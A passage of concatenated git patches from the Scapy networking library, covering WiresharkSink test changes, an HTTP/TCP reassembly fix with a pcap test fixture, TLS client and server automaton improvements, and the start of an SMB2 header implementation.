src="bb:bb:bb:bb:bb:bb")/IP(dst="127.0.0.1", src="127.0.0.1")/ICMP() -with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=f)) as popen: - p = PipeEngine() - src = CLIFeeder() +import mock +with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=q)) as popen: sink = WiresharkSink(linktype=linktype) - p.add(src > sink) - p.start() - src.send(pkt) - src.close() - # Prevent stop from closing the BytesIO - with mock.patch.object(f, 'close'): - p.wait_and_stop() + sink.start() -popen.assert_called_once_with( - [conf.prog.wireshark, '-Slki', '-'], - stdin=subprocess.PIPE, stdout=None, stderr=None) - -bytes_hex(f.getvalue()) -bytes_hex(raw(pkt)) -assert raw(pkt) in f.getvalue() +sink.push(pkt) -# Check that the linktype was also correct -f.seek(0) or None -r = PcapReader(f) -assert r.linktype == DLT_EN3MB -r.close() +chb(linktype) in q.recv() +q.recv() +assert raw(pkt) in q.recv() = Test WiresharkSink with args +~ wiresharksink -f = BytesIO() -pkt = Ether(src="aa:aa:aa:aa:aa:aa", dst="aa:aa:aa:aa:aa:aa")/IP(src="127.0.0.1", dst="127.0.0.1")/ICMP() +linktype = scapy.data.DLT_EN3MB +q = ObjectPipe() +pkt = Ether(dst="aa:aa:aa:aa:aa:aa", src="bb:bb:bb:bb:bb:bb")/IP(dst="127.0.0.1", src="127.0.0.1")/ICMP() -with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=f)) as popen: - p = PipeEngine() - src = CLIFeeder() +import mock +with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=q)) as popen: sink = WiresharkSink(args=['-c', '1']) - p.add(src > sink) - p.start() - src.send(pkt) - src.close() - # Prevent stop from closing the BytesIO - with mock.patch.object(f, 'close'): - p.wait_and_stop() + sink.start() + +sink.push(pkt) popen.assert_called_once_with( [conf.prog.wireshark, '-Slki', '-', '-c', '1'], stdin=subprocess.PIPE, stdout=None, stderr=None) -bytes_hex(f.getvalue()) -bytes_hex(raw(pkt)) -assert raw(pkt) in f.getvalue() - = Test RdpcapSource and WrpcapSink dname = get_temp_dir() From bed88cac199717a9ab0b14e4dd5cbd3ceaddc04e Mon Sep 17 00:00:00 2001 From: Gabriel Date: Tue, 5 May 2020 12:25:41 +0200 Subject: [PATCH 0132/1632] 2493 rebase (#2610) * Fixed HTTP Request parsing issue and http response with TCP PSH flag issue * Fixed a bug with upgrade to HTTP2.0 * Added UT, revised notes according to PEP8 * Fixed minor bug in scapy sessions * Minor fixes * Gzip file Co-authored-by: nivh-sam --- scapy/layers/http.py | 14 ++++++++++++++ scapy/sessions.py | 9 +++++++-- test/pcaps/http_tcp_psh.pcap.gz | Bin 0 -> 2932 bytes test/regression.uts | 15 +++++++++++++++ 4 files changed, 36 insertions(+), 2 deletions(-) create mode 100644 test/pcaps/http_tcp_psh.pcap.gz diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 54b3c139340..eb8451eab93 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -563,8 +563,22 @@ def tcp_reassemble(cls, data, metadata): # It's not Content-Length based. It could be chunked encodings = http_packet[HTTP].payload._get_encodings() chunked = ("chunked" in encodings) + is_response = isinstance(http_packet.payload, HTTPResponse) if chunked: detect_end = lambda dat: dat.endswith(b"\r\n\r\n") + # HTTP Requests that do not have any content, + # end with a double CRLF + elif isinstance(http_packet.payload, HTTPRequest): + detect_end = lambda dat: dat.endswith(b"\r\n\r\n") + # In case we are handling a HTTP Request, + # we want to continue assessing the data, + # to handle requests with a body (POST) + metadata["detect_unknown"] = True + elif is_response and http_packet.Status_Code == b"101": + # If it's an upgrade response, it may also hold a + # different protocol data. + # make sure all headers are present + detect_end = lambda dat: dat.find(b"\r\n\r\n") else: # If neither Content-Length nor chunked is specified, # it means it's the TCP packet that contains the data, diff --git a/scapy/sessions.py b/scapy/sessions.py index fa1ae8e276f..905cc3f5a92 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -213,7 +213,7 @@ def _process_packet(self, pkt): to follow the TCP streams, and orders the fragments. """ from scapy.layers.inet import IP, TCP - if TCP not in pkt: + if not pkt or TCP not in pkt: return pkt pay = pkt[TCP].payload if isinstance(pay, (NoPayload, conf.padding_layer)): @@ -241,8 +241,13 @@ def _process_packet(self, pkt): # Note that this take care of retransmission packets. data.append(new_data, seq) # Check TCP FIN or TCP RESET - if pkt[TCP].flags.F or pkt[TCP].flags.R or pkt[TCP].flags.P: + if pkt[TCP].flags.F or pkt[TCP].flags.R: metadata["tcp_end"] = True + + # In case any app layer protocol requires it, + # allow the parser to inspect TCP PSH flag + if pkt[TCP].flags.P: + metadata["tcp_psh"] = True # XXX TODO: check that no empty space is missing in the buffer. # XXX Currently, if a TCP fragment was missing, we won't notice it. packet = None diff --git a/test/pcaps/http_tcp_psh.pcap.gz b/test/pcaps/http_tcp_psh.pcap.gz new file mode 100644 index 0000000000000000000000000000000000000000..6b8b170a3572d6e632bb65cf3b0bfde716711a4b GIT binary patch literal 2932 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 literal 0 HcmV?d00001 diff --git a/test/regression.uts b/test/regression.uts index 6e616625f7f..380b3e44c8e 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -7595,6 +7595,21 @@ pkts[0].show() assert HTTPResponse in pkts[0] assert pkts[0].load == b'This is a test file for testing brotli decompression in Wireshark\n' += HTTP PSH bug fix + +tmp = "/test/pcaps/http_tcp_psh.pcap.gz" +filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp +filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename + +pkts = sniff(offline=filename, session=TCPSession) + +assert len(pkts) == 15 +# Verify a split header exists in the packet +assert pkts[5].User_Agent == b'example_user_agent' + +# Verify all of the resonse data exists in the packet +assert int(pkts[7][HTTP].Content_Length.decode()) == len(pkts[7][Raw].load) + = HTTP build pkt = TCP()/HTTP()/HTTPRequest(Method=b'GET', Path=b'/download', Http_Version=b'HTTP/1.1', Accept=b'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', Accept_Encoding=b'gzip, deflate', Accept_Language=b'en-US,en;q=0.5', Cache_Control=b'max-age=0', Connection=b'keep-alive', Host=b'scapy.net', User_Agent=b'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0') From f77011a12bd5e5ece8a9dc9511c50eb82bc3709d Mon Sep 17 00:00:00 2001 From: gpotter Date: Thu, 7 May 2020 00:09:26 +0200 Subject: [PATCH 0133/1632] Minor formatting fixes --- scapy/layers/tls/automaton_cli.py | 12 +++++++----- scapy/layers/tls/automaton_srv.py | 2 +- 2 files changed, 8 insertions(+), 6 deletions(-) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 91ce7840fe7..9078160dc77 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -202,7 +202,7 @@ def INIT_TLS_SESSION(self): self.advertised_tls_version = default_version if s.advertised_tls_version >= 0x0304: - # For out of band PSK, the PSK is given as argument + # For out of band PSK, the PSK is given as an argument # to the automaton if self.tls13_psk_secret: s.tls13_psk_secret = binascii.unhexlify(self.tls13_psk_secret) @@ -223,9 +223,11 @@ def INIT_TLS_SESSION(self): tmp = f.read(client_ticket_age_len) s.client_ticket_age = struct.unpack("!I", tmp)[0] - client_ticket_age_add_len = struct.unpack("!H", f.read(2))[0] # noqa: E501 + client_ticket_age_add_len = struct.unpack( + "!H", f.read(2))[0] tmp = f.read(client_ticket_age_add_len) - s.client_session_ticket_age_add = struct.unpack("!I", tmp)[0] # noqa: E501 + s.client_session_ticket_age_add = struct.unpack( + "!I", tmp)[0] ticket_len = struct.unpack("!H", f.read(2))[0] s.client_session_ticket = f.read(ticket_len) @@ -617,7 +619,7 @@ def should_handle_ServerData(self): elif isinstance(p, TLS13NewSessionTicket): print("> Received: %r " % p) # If arg session_ticket_file_out is set, we save - # Save the ticket for resumption... + # the ticket for resumption... if self.session_ticket_file_out: # Struct of ticket file : # * ciphersuite_len (1 byte) @@ -639,7 +641,7 @@ def should_handle_ServerData(self): # * ticket (ticket_len bytes) with open(self.session_ticket_file_out, 'wb') as f: f.write(struct.pack("B", 2)) - # we choose wcs arbitrary... + # we choose wcs arbitrarily... f.write(struct.pack("!H", self.cur_session.wcs.ciphersuite.val)) f.write(struct.pack("B", p.noncelen)) diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index 6b0d9463f9c..bd8ebbe9c03 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -128,7 +128,7 @@ def parse_args(self, server="127.0.0.1", sport=4433, self.psk_secret = psk self.psk_mode = psk_mode if handle_session_ticket is None: - handle_session_ticket = (session_ticket_file is not None) + handle_session_ticket = session_ticket_file is not None if handle_session_ticket: session_ticket_file = session_ticket_file or get_temp_file() self.handle_session_ticket = handle_session_ticket From 1c8e90a9b1919a392a5af307b860179497f1e617 Mon Sep 17 00:00:00 2001 From: gpotter Date: Sat, 2 May 2020 23:24:08 +0200 Subject: [PATCH 0134/1632] TLS: Add ServerName to Automaton CLI --- scapy/layers/tls/automaton_cli.py | 17 +++++++++++++++-- test/tls/example_client.py | 18 +++++++++++++++--- 2 files changed, 30 insertions(+), 5 deletions(-) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 9078160dc77..5b1067751d9 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -33,7 +33,8 @@ from scapy.layers.tls.session import tlsSession from scapy.layers.tls.extensions import TLS_Ext_SupportedGroups, \ TLS_Ext_SupportedVersion_CH, TLS_Ext_SignatureAlgorithms, \ - TLS_Ext_SupportedVersion_SH, TLS_Ext_PSKKeyExchangeModes + TLS_Ext_SupportedVersion_SH, TLS_Ext_PSKKeyExchangeModes, \ + TLS_Ext_ServerName, ServerName from scapy.layers.tls.handshake import TLSCertificate, TLSCertificateRequest, \ TLSCertificateVerify, TLSClientHello, TLSClientKeyExchange, \ TLSEncryptedExtensions, TLSFinished, TLSServerHello, TLSServerHelloDone, \ @@ -278,9 +279,16 @@ def should_add_ClientHello(self): p = self.client_hello else: p = TLSClientHello() + ext = [] # Add TLS_Ext_SignatureAlgorithms for TLS 1.2 ClientHello if self.cur_session.advertised_tls_version == 0x0303: - p.ext = TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsa"]) + ext += [TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsa"])] + # Add TLS_Ext_ServerName + if self.remote_name: + ext += TLS_Ext_ServerName( + servernames=[ServerName(servername=self.remote_name)] + ) + p.ext = ext self.add_msg(p) raise self.ADDED_CLIENTHELLO() @@ -1049,6 +1057,11 @@ def tls13_should_add_ClientHello(self): ) ext += TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsaepss", "sha256+rsa"]) + # Add TLS_Ext_ServerName + if self.remote_name: + ext += TLS_Ext_ServerName( + servernames=[ServerName(servername=self.remote_name)] + ) p.ext = ext self.add_msg(p) raise self.TLS13_ADDED_CLIENTHELLO() diff --git a/test/tls/example_client.py b/test/tls/example_client.py index 046de55f7ee..2bb25e8dc53 100755 --- a/test/tls/example_client.py +++ b/test/tls/example_client.py @@ -14,6 +14,7 @@ basedir = os.path.abspath(os.path.join(os.path.dirname(__file__),"../../")) sys.path=[basedir]+sys.path +from scapy.utils import inet_aton from scapy.layers.tls.automaton_cli import TLSClientAutomaton from scapy.layers.tls.basefields import _tls_version_options from scapy.layers.tls.handshake import TLSClientHello, TLS13ClientHello @@ -34,6 +35,10 @@ help="File to write a ticket to (for TLS 1.3)") parser.add_argument("--res_master", help="Resumption master secret (for TLS 1.3)") +parser.add_argument("server", nargs="?", + help="The server to connect to") +parser.add_argument("port", nargs="?", type=int, + help="The TCP destination port") args = parser.parse_args() @@ -47,8 +52,6 @@ if not v: sys.exit("Unrecognized TLS version option.") - - if args.ciphersuite: ciphers = int(args.ciphersuite, 16) if ciphers not in list(range(0x1301, 0x1306)): @@ -58,7 +61,16 @@ else: ch = None -t = TLSClientAutomaton(client_hello=ch, +server_name = None +if args.server: + try: + inet_aton(args.server) + except socket.error: + server_name = args.server + +t = TLSClientAutomaton(server=args.server, dport=args.port, + server_name=server_name, + client_hello=ch, version=args.version, mycert=basedir+"/test/tls/pki/cli_cert.pem", mykey=basedir+"/test/tls/pki/cli_key.pem", From 72550d9ae22ef10df74561e3ae30ae7c57eb9611 Mon Sep 17 00:00:00 2001 From: gpotter Date: Sun, 3 May 2020 19:12:38 +0200 Subject: [PATCH 0135/1632] GREASE TLS --- scapy/layers/tls/handshake.py | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 294b7832368..77c5d54bb28 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -311,7 +311,12 @@ def tls_session_update(self, msg_str): if self.ext: for e in self.ext: if isinstance(e, TLS_Ext_SupportedVersion_CH): - s.advertised_tls_version = e.versions[0] + for ver in e.versions: + # RFC 8701: GREASE of TLS will send unknown versions + # here. We have to ignore them + if ver in _tls_version: + s.advertised_tls_version = ver + break if s.sid: s.middlebox_compatibility = True @@ -437,7 +442,12 @@ def tls_session_update(self, msg_str): if self.ext: for e in self.ext: if isinstance(e, TLS_Ext_SupportedVersion_CH): - self.tls_session.advertised_tls_version = e.versions[0] + for ver in e.versions: + # RFC 8701: GREASE of TLS will send unknown versions + # here. We have to ignore them + if ver in _tls_version: + s.advertised_tls_version = ver + break if isinstance(e, TLS_Ext_SignatureAlgorithms): s.advertised_sig_algs = e.sig_algs From 916382a6d3c579d91df17827f6db55a44d159e1f Mon Sep 17 00:00:00 2001 From: gpotter Date: Sun, 3 May 2020 19:12:55 +0200 Subject: [PATCH 0136/1632] TLS test client & server improvements --- scapy/layers/tls/automaton_cli.py | 2 +- scapy/layers/tls/automaton_srv.py | 2 ++ scapy/layers/tls/handshake.py | 2 +- test/tls/example_client.py | 17 ++++++++++++++--- test/tls/example_server.py | 15 ++++++++++++++- 5 files changed, 32 insertions(+), 6 deletions(-) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 5b1067751d9..0789cab2497 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -93,8 +93,8 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, super(TLSClientAutomaton, self).parse_args(mycert=mycert, mykey=mykey, **kargs) - tmp = socket.getaddrinfo(server, dport) self.remote_name = None + tmp = socket.getaddrinfo(server, dport) try: if ':' in server: inet_pton(socket.AF_INET6, server) diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index bd8ebbe9c03..2330c222f5f 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -253,6 +253,7 @@ def RECEIVED_CLIENTFLIGHT1(self): pass # TLS handshake # + @ATMT.condition(RECEIVED_CLIENTFLIGHT1, prio=1) def tls13_should_handle_ClientHello(self): self.raise_on_packet(TLS13ClientHello, @@ -410,6 +411,7 @@ def should_handle_Alert_from_ClientCertificate(self): @ATMT.state() def HANDLED_ALERT_FROM_CLIENTCERTIFICATE(self): self.vprint("Received Alert message instead of ClientKeyExchange!") + self.cur_pkt.show() raise self.CLOSE_NOTIFY() @ATMT.condition(HANDLED_CLIENTCERTIFICATE, prio=3) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 77c5d54bb28..22c6e956da8 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -446,7 +446,7 @@ def tls_session_update(self, msg_str): # RFC 8701: GREASE of TLS will send unknown versions # here. We have to ignore them if ver in _tls_version: - s.advertised_tls_version = ver + self.tls_session.advertised_tls_version = ver break if isinstance(e, TLS_Ext_SignatureAlgorithms): s.advertised_sig_algs = e.sig_algs diff --git a/test/tls/example_client.py b/test/tls/example_client.py index 2bb25e8dc53..b20a59aa8cd 100755 --- a/test/tls/example_client.py +++ b/test/tls/example_client.py @@ -10,10 +10,15 @@ import os import sys +import logging + +logger = logging.getLogger("scapy") +logger.addHandler(logging.StreamHandler()) basedir = os.path.abspath(os.path.join(os.path.dirname(__file__),"../../")) sys.path=[basedir]+sys.path +from scapy.config import conf from scapy.utils import inet_aton from scapy.layers.tls.automaton_cli import TLSClientAutomaton from scapy.layers.tls.basefields import _tls_version_options @@ -35,9 +40,11 @@ help="File to write a ticket to (for TLS 1.3)") parser.add_argument("--res_master", help="Resumption master secret (for TLS 1.3)") -parser.add_argument("server", nargs="?", +parser.add_argument("--debug", action="store_const", const=5, default=0, + help="Enter debug mode") +parser.add_argument("server", nargs="?", default="127.0.0.1", help="The server to connect to") -parser.add_argument("port", nargs="?", type=int, +parser.add_argument("port", nargs="?", type=int, default=4433, help="The TCP destination port") args = parser.parse_args() @@ -68,6 +75,10 @@ except socket.error: server_name = args.server +if args.debug == 5: + conf.logLevel = 10 + conf.warning_threshold = 0 + t = TLSClientAutomaton(server=args.server, dport=args.port, server_name=server_name, client_hello=ch, @@ -79,6 +90,6 @@ resumption_master_secret=args.res_master, session_ticket_file_in=args.session_ticket_file_in, session_ticket_file_out=args.session_ticket_file_out, - ) + debug=args.debug) t.run() diff --git a/test/tls/example_server.py b/test/tls/example_server.py index c73d1104785..f7b68487f12 100755 --- a/test/tls/example_server.py +++ b/test/tls/example_server.py @@ -13,10 +13,15 @@ import os import sys +import logging + +logger = logging.getLogger("scapy") +logger.addHandler(logging.StreamHandler()) basedir = os.path.abspath(os.path.join(os.path.dirname(__file__),"../../")) sys.path=[basedir]+sys.path +from scapy.config import conf from scapy.layers.tls.automaton_srv import TLSServerAutomaton from argparse import ArgumentParser @@ -35,6 +40,8 @@ help="Use session tickets. Auto enabled if file provided (for TLS 1.3)") # noqa: E501 parser.add_argument("--ticket_file", dest='session_ticket_file', help="File to write/read a ticket to (for TLS 1.3)") +parser.add_argument("--debug", action="store_const", const=5, default=0, + help="Enter debug mode") args = parser.parse_args() pcs = None @@ -43,6 +50,11 @@ psk_mode = "psk_ke" else: psk_mode = "psk_dhe_ke" + +if args.debug == 5: + conf.logLevel = 10 + conf.warning_threshold = 0 + t = TLSServerAutomaton(mycert=basedir+'/test/tls/pki/srv_cert.pem', mykey=basedir+'/test/tls/pki/srv_key.pem', preferred_ciphersuite=pcs, @@ -52,6 +64,7 @@ handle_session_ticket=args.handle_session_ticket, session_ticket_file=args.session_ticket_file, psk=args.psk, - psk_mode=psk_mode) + psk_mode=psk_mode, + debug=args.debug) t.run() From f42ad9b4ed68fd2e92aa9e0da3b0f2160344e4d4 Mon Sep 17 00:00:00 2001 From: gpotter Date: Sun, 3 May 2020 21:52:40 +0200 Subject: [PATCH 0137/1632] Add another TLSAlert handle --- scapy/layers/tls/automaton_srv.py | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index 2330c222f5f..118f510a475 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -460,6 +460,7 @@ def should_handle_Alert_from_ClientKeyExchange(self): @ATMT.state() def HANDLED_ALERT_FROM_CLIENTKEYEXCHANGE(self): self.vprint("Received Alert message instead of ChangeCipherSpec!") + self.cur_pkt.show() raise self.CLOSE_NOTIFY() @ATMT.condition(HANDLED_CERTIFICATEVERIFY, prio=3) @@ -844,17 +845,28 @@ def tls13_should_handle_ClientFlight2(self): self.raise_on_packet(TLS13Certificate, self.TLS13_HANDLED_CLIENTCERTIFICATE) + @ATMT.condition(tls13_RECEIVED_CLIENTFLIGHT2, prio=2) + def tls13_should_handle_Alert_from_ClientCertificate(self): + self.raise_on_packet(TLSAlert, + self.TLS13_HANDLED_ALERT_FROM_CLIENTCERTIFICATE) + + @ATMT.state() + def TLS13_HANDLED_ALERT_FROM_CLIENTCERTIFICATE(self): + self.vprint("Received Alert message instead of ClientKeyExchange!") + self.cur_pkt.show() + raise self.CLOSE_NOTIFY() + # For Middlebox compatibility (see RFC8446, appendix D.4) # a dummy ChangeCipherSpec record can be send. In this case, # this function just read the ChangeCipherSpec message and # go back in a previous state continuing with the next TLS 1.3 # record - @ATMT.condition(tls13_RECEIVED_CLIENTFLIGHT2, prio=2) + @ATMT.condition(tls13_RECEIVED_CLIENTFLIGHT2, prio=3) def tls13_should_handle_ClientCCS(self): self.raise_on_packet(TLSChangeCipherSpec, self.tls13_RECEIVED_CLIENTFLIGHT2) - @ATMT.condition(tls13_RECEIVED_CLIENTFLIGHT2, prio=3) + @ATMT.condition(tls13_RECEIVED_CLIENTFLIGHT2, prio=4) def tls13_no_ClientCertificate(self): if self.client_auth: raise self.TLS13_MISSING_CLIENTCERTIFICATE() From 8e46d38cfd9ac54bb2e57289e9e5baf7074e2138 Mon Sep 17 00:00:00 2001 From: _Frky <3105926+Frky@users.noreply.github.com> Date: Thu, 2 Apr 2020 09:57:05 +0200 Subject: [PATCH 0138/1632] Minimalistic implementation of SMB2 headers Includes: - change guess_payload_class in Packet to handle lambda filters - add NByte and XNBytes fields, StrFieldUtf16 - add tests for SMB2 and for new fields --- scapy/config.py | 2 +- scapy/fields.py | 67 ++++++++- scapy/layers/netbios.py | 4 +- scapy/layers/smb.py | 3 + scapy/layers/smb2.py | 304 ++++++++++++++++++++++++++++++++++++++++ scapy/packet.py | 10 +- test/fields.uts | 68 +++++++++ test/smb2.uts | 244 ++++++++++++++++++++++++++++++++ 8 files changed, 697 insertions(+), 5 deletions(-) create mode 100644 scapy/layers/smb2.py create mode 100644 test/smb2.uts diff --git a/scapy/config.py b/scapy/config.py index d76d5d53a50..e9e4611418c 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -628,7 +628,7 @@ class Conf(ConfClass): 'inet6', 'ipsec', 'ir', 'isakmp', 'l2', 'l2tp', 'llmnr', 'lltd', 'mgcp', 'mobileip', 'netbios', 'netflow', 'ntp', 'ppi', 'ppp', 'pptp', 'radius', 'rip', - 'rtp', 'sctp', 'sixlowpan', 'skinny', 'smb', 'snmp', + 'rtp', 'sctp', 'sixlowpan', 'skinny', 'smb', 'smb2', 'snmp', 'tftp', 'vrrp', 'vxlan', 'x509', 'zigbee'] #: a dict which can be used by contrib layers to store local #: configuration diff --git a/scapy/fields.py b/scapy/fields.py index fc13aaa459c..b9f392ef398 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -38,6 +38,7 @@ from scapy.error import warning import scapy.modules.six as six from scapy.modules.six.moves import range +from scapy.modules.six import integer_types """ @@ -744,6 +745,46 @@ def i2repr(self, pkt, x): return XByteField.i2repr(self, pkt, x) +class NBytesField(ByteField, Field): + def __init__(self, name, default, sz): + Field.__init__(self, name, default, "<" + "B" * sz) + + def i2m(self, pkt, x): + x2m = list() + for _ in range(self.sz): + x2m.append(x % 256) + x //= 256 + return x2m[::-1] + + def m2i(self, pkt, x): + if isinstance(x, int): + return x + # x can be a tuple when coming from struct.unpack (from getfield) + if isinstance(x, (list, 